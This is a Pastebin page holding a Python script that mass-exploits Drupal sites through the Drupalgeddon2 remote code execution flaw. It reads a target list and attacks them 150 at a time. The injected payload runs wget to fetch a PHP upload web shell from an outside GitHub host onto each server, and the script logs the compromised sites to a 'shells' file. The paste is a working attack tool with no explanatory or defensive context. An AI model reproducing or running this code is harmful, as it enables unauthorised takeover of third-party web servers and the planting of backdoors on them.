daily pastebin goal
84%
SHARE
TWEET

Untitled

a guest Apr 17th, 2018 69 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env
  2. import sys
  3. import requests
  4. from multiprocessing.dummy import Pool
  5.  
  6. requests.urllib3.disable_warnings()
  7.  
  8. try:
  9.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  10. except IndexError:
  11.     exit('Usage: d.py list.txt')
  12.  
  13. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  14. headers = {'User-Agent': 'Mozilla 5.0'}
  15.  
  16. def run(u):
  17.     try:
  18.         url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  19.         r = requests.post(url, data=payload, verify=False, headers=headers)
  20.         if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text:
  21.             print ('\n\aUploaded:', u + '/payload.php\n')
  22.             with open('drupals_shells.txt', mode='a') as d:
  23.                 d.write(u + '/payload.php\n')
  24.         else:
  25.             print(u, " -> Not exploitable")
  26.     except:
  27.         pass
  28.  
  29. mp = Pool(150)
  30. mp.map(run, target)
  31. mp.close()
  32. mp.join()
RAW Paste Data
Top